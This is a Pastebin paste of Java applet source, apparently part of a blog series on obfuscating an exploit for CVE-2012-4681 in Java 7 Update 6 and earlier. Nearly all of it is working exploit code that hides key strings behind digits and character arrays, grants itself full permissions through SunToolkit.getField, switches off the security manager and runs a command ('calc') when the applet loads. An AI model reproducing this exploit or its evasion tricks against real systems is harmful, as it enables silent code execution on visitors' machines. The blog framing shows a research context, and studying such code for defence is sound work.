Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- * Java 7 Exploit CVE-2012-4681 obfuscation pt. 2/5
- *
- * Affected product versions:
- * - JDK and JRE 7 Update 6 and before
- *
- * Post link: http://security-obscurity.blogspot.com/2012/11/java-exploit-code-obfuscation-and.html
- */
- import java.applet.Applet;
- import java.awt.Graphics;
- import java.beans.Expression;
- import java.beans.Statement;
- import java.lang.reflect.Field;
- import java.net.URL;
- import java.security.*;
- import java.security.cert.Certificate;
- public class Java extends Applet
- {
- String secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
- char sun[] = {'s','u','n','.','a','w','t','.','S','u','n','T','o','o','l','k','i','t'};
- char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47}; // file
- String ad = "or",me = "me", aw = "f", kl = "Na"; // forName
- String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567"; // getField
- public void enableSecurity() throws Throwable
- {
- Statement localStatement = new Statement(System.class, secMan.replaceAll("\\d",""), new Object[1]);
- Permissions localPermissions = new Permissions();
- localPermissions.add(new AllPermission());
- ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL(new String(file)), new Certificate[0]), localPermissions);
- AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
- localProtectionDomain
- });
- Object arrayOfObject[] = new Object[2];
- arrayOfObject[0] = Statement.class;
- arrayOfObject[1] = "a"+"c"+"c";
- Expression localExpression = new Expression(GetClass(new String(sun)), field.replaceAll("\\d",""), arrayOfObject);
- localExpression.execute();
- ((Field)localExpression.getValue()).set(localStatement, localAccessControlContext);
- localStatement.execute();
- }
- public void init()
- {
- try
- {
- enableSecurity();
- Runtime.getRuntime().exec("calc");
- }
- catch(Throwable t){}
- }
- private Class GetClass(String paramString) throws Throwable
- {
- Object arrayOfObject[] = new Object[1];
- arrayOfObject[0] = paramString;
- Expression localExpression = new Expression(Class.class, aw+ad+kl+me, arrayOfObject);
- localExpression.execute();
- return (Class)localExpression.getValue();
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement